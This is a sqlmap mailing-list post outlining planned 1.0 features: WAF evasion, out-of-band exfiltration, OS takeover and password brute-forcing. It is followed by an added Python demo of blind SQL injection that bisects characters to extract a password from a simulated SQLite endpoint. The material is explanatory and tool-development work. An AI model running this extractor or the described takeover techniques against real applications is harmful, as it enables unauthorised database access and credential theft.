Hi,

Now that some weeks have passed since 0.9 was released and we have got the first bunch of bug reports and feature requests (thanks!), it's time to plan the development for the upcoming release: 1.0!
Miroslav and I came up with a pretty well-defined list of things to do, but we would very much appreciate your feedback, comments and help in implementing these and other features.

Detection/bisection:

* Implement anti-CSRF protection bypass (e.g. .NET VIEWSTATE): this will definitely be in!
* Blind SQL injection possible enhancements [1]: we will evaluate this and see if the benefit is worth the code changes, as our bisection algorithm these days is pretty strong and fast and always has a lot of possible optimizations (see the -o switch and other relevant ones).
* Confirm injection in another page (feature requested by someone on the mailing list).

Enumeration:

* Enumerate binary field data: Miroslav has been putting lots of effort into support for Unicode characters, recognition of page/DBMS encoding and enumeration of "dodgy" characters. The next step will be enumeration of binary data (e.g. images in BLOB datatype columns and the like) and automatic reconstruction of this data locally.
* Implement out-of-band data fetching: we may possibly implement this. It would be split into the following functions:
  * HTTP requests (Oracle UTL_HTTP)
  * UNC paths (can be done in all DBMS, as far as I know)
  * openrowset (to replicate the DBMS remotely on MSSQL)
  * db_link() (to replicate the DBMS remotely on PgSQL)
* Data extraction for multiple entries on a single line: we have started to work on this feature. It has been a long-requested feature by many of you.

Miscellaneous:

* IDS/IPS evasion: we have got --tamper and support for custom tamper scripts (see the user's manual). The next step will be to automatically detect and bypass custom-implemented IDS/IPS and some specific enterprise-grade IPS/WAF solutions.
* Report/output in XML/XSLT: feature requested many times. It was partially implemented some time ago, but was too outdated and buggy, so it did not make it into 0.9. We will possibly implement it for 1.0.

Plugins:

* Support for PostgreSQL 9.0: it is on its way. Active fingerprint (-f) has been adapted. Takeover switch --os-pwn works for Windows 32-bit too; Linux and Windows 64-bit will follow soon.
* Identify linked/cluster DBMS servers when possible: as far as I know this can be done on MSSQL. Any idea how to do this on other DBMS like Oracle?

Request:

* Decode/re-encode parameters in base64/hex: low priority, but it might save a hell of a lot of time during pentests where the vulnerable parameter's value has to be encoded before being sent to the web server.

Takeover:

* Operating system access support on Oracle: this might seem easy and very useful. It's not. Oracle by design does not support stacked queries in SQL statements. It does within PL/SQL code in functions/triggers/etc. Therefore, if the web application that you are targeting has a SQL injection within a custom or default function/procedure, then yes, you are likely to privesc and take over the OS. Ideas and help to implement this feature are more than welcome!
* File system access support on Oracle: same as above.
* Option to escalate DBMS user privileges via PL/SQL on Oracle: same as above.
* Option to perform DBA password brute-force on PgSQL/MSSQL: it will make it into 1.0.
* Download shellcodeexec/file via TFTP/FTP/HTTP from the attacker machine (for --file-write and --os-pwn).

There are a few other TODO items, mostly related to code refactoring, bug fixes and mandatory things to be done before these features can be worked on.

Now we look forward to hearing from you. Thank you!

[1] http://websec.wordpress.com/2011/04/06/blind-sqli-techniques/

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
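Two of the items above (the bisection algorithm behind blind SQL injection, and parameters that must be base64-encoded before they reach the server) are easier to reason about with a worked example. The following is an added illustration, not sqlmap's code and not part of the e-mail above. It assumes an in-memory SQLite database as a stand-in for the target DBMS, a made-up `users` table, an endpoint that base64-decodes an `id` parameter before concatenating it into a query, and that the value being extracted is printable ASCII (codes 32..126); all of these are constructed for the demo. The only signal the extractor uses is "did the page show a row or not", and each character is recovered by halving the candidate interval on every request.

```python
import base64
import sqlite3
from typing import Tuple

# Constructed stand-in for the target: an in-memory SQLite database plays the
# backend DBMS and vulnerable_app() plays the web endpoint. Nothing here is a
# real site; table and column names are assumptions made for the demo.
_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
_db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                [(1, "admin", "s3cr3t!"), (2, "bob", "hunter2")])


def vulnerable_app(encoded_id: str) -> bool:
    """Simulated endpoint. The 'id' parameter must arrive base64-encoded; the
    decoded value is concatenated into the query (the injection bug). Returns
    True when the page would render a row, False otherwise: that boolean is
    the only signal the attacker gets."""
    raw = base64.b64decode(encoded_id).decode()
    rows = _db.execute(f"SELECT name FROM users WHERE id={raw}").fetchall()
    return len(rows) > 0


requests_made = 0


def oracle(condition: str) -> bool:
    """Boolean-based blind oracle: inject the condition behind the known-good
    id, then base64-encode the whole value because the parameter demands it.
    Encoding at this layer is what the 'decode/re-encode parameters' request
    in the e-mail is about: the injection logic never has to know."""
    global requests_made
    requests_made += 1
    payload = f"1 AND ({condition})"
    return vulnerable_app(base64.b64encode(payload.encode()).decode())


def extract_int(expr: str, lo: int, hi: int) -> int:
    """Bisection over the closed range [lo, hi]: each request halves the
    candidate interval by asking whether expr is greater than the midpoint,
    so a value among N integers costs about log2(N) requests instead of up
    to N with a linear scan."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{expr} > {mid}"):
            lo = mid + 1  # value is in (mid, hi]
        else:
            hi = mid      # value is in [lo, mid]
    return lo


def extract_string(expr: str, max_len: int = 64) -> str:
    """Pull a scalar subquery result one character at a time. Assumes
    printable ASCII (codes 32..126); the equality check after each
    bisection catches a value outside that range instead of silently
    returning a wrong character."""
    length = extract_int(f"LENGTH(({expr}))", 0, max_len)
    out = []
    for pos in range(1, length + 1):
        char_expr = f"UNICODE(SUBSTR(({expr}), {pos}, 1))"
        code = extract_int(char_expr, 32, 126)
        if not oracle(f"{char_expr} = {code}"):
            raise ValueError(f"character {pos} is outside the assumed range")
        out.append(chr(code))
    return "".join(out)


def demo() -> Tuple[str, int]:
    """Extract the admin password and report how many requests it took."""
    global requests_made
    requests_made = 0
    value = extract_string("SELECT password FROM users WHERE name='admin'")
    return value, requests_made


if __name__ == "__main__":
    secret, n = demo()
    print(f"extracted {secret!r} in {n} requests")
```

Recovering a 7-character value this way costs roughly 60 requests (5 for the length, at most 8 per character including the confirmation query), where a character-by-character linear scan of the printable range would average close to 50 per character. The confirmation query is the practitioner's check: when the target holds non-ASCII or binary data (the "dodgy characters" and BLOB enumeration items above), the bisection range assumed here is wrong and the equality test fails loudly rather than returning plausible garbage.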